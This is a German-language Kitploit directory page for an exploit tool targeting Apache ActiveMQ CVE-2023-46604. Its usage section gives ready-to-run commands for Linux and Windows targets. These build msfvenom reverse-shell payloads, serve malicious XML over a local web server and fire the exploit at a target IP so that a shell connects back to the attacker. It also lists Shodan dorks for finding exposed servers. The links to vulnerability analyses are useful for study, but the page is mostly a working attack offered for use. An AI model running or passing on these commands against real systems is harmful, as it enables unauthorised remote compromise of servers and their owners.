Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ — Erreichen eines Reverse-Shell-Exploits für Apache ActiveMQ (CVE_2023-46604) | Kitploit
Tools/GitHubGitHub/saumyajeetdas/cve-2023-46604-rce-reverse-shell-apache-activemq
Payload-GenerierungSchwachstellenanalyseExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubsaumyajeetdas/cve-2023-46604-rce-reverse-shell-apache-activemq

CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

Erreichen eines Reverse-Shell-Exploits für Apache ActiveMQ (CVE_2023-46604)

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
12640vor 2 JahrenVon Kitploit geprüft

CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

Dieser Exploit baut auf der grundlegenden Arbeit auf, die unter https://github.com/X1cT34m (https://github.com/X1r0z/ActiveMQ-RCE) verfügbar ist. Wir haben die Technik weiterentwickelt, um eine Reverse Shell unter Verwendung des Metasploit Frameworks (https://github.com/rapid7/metasploit-framework) zu erreichen.

Verwendung:

Wichtig: Ändern Sie manuell die IP-Adresse (0.0.0.0 in Zeile 11) in den XML-Dateien in die IP-Adresse, unter der das Payload generiert wird. Wenn Sie die folgenden Befehle befolgen, wird dies Ihre Listener-IP-Adresse sein. Auch {IP_Of_Hosted_XML_File} wird Ihre Listener-IP-Adresse sein.

Für Linux/Unix-Ziele

root@kitploit:~
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-linux.xml

Für Windows-Ziele

root@kitploit:~
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f eXE -o test.exe
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-windows.xml

image

Shodan Dork:

  • product:"ActiveMQ OpenWire Transport"
  • image
  • product:"ActiveMQ OpenWire Transport" port:61616
  • image

Ursprüngliche Arbeit:

  • https://github.com/X1r0z/ActiveMQ-RCE

Für weiterführende Lektüre:

  • https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/
  • https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/
  • https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis

Ein besonderer Dank geht an https://github.com/Anon4mous für die aktive Unterstützung.

Tool herunterladen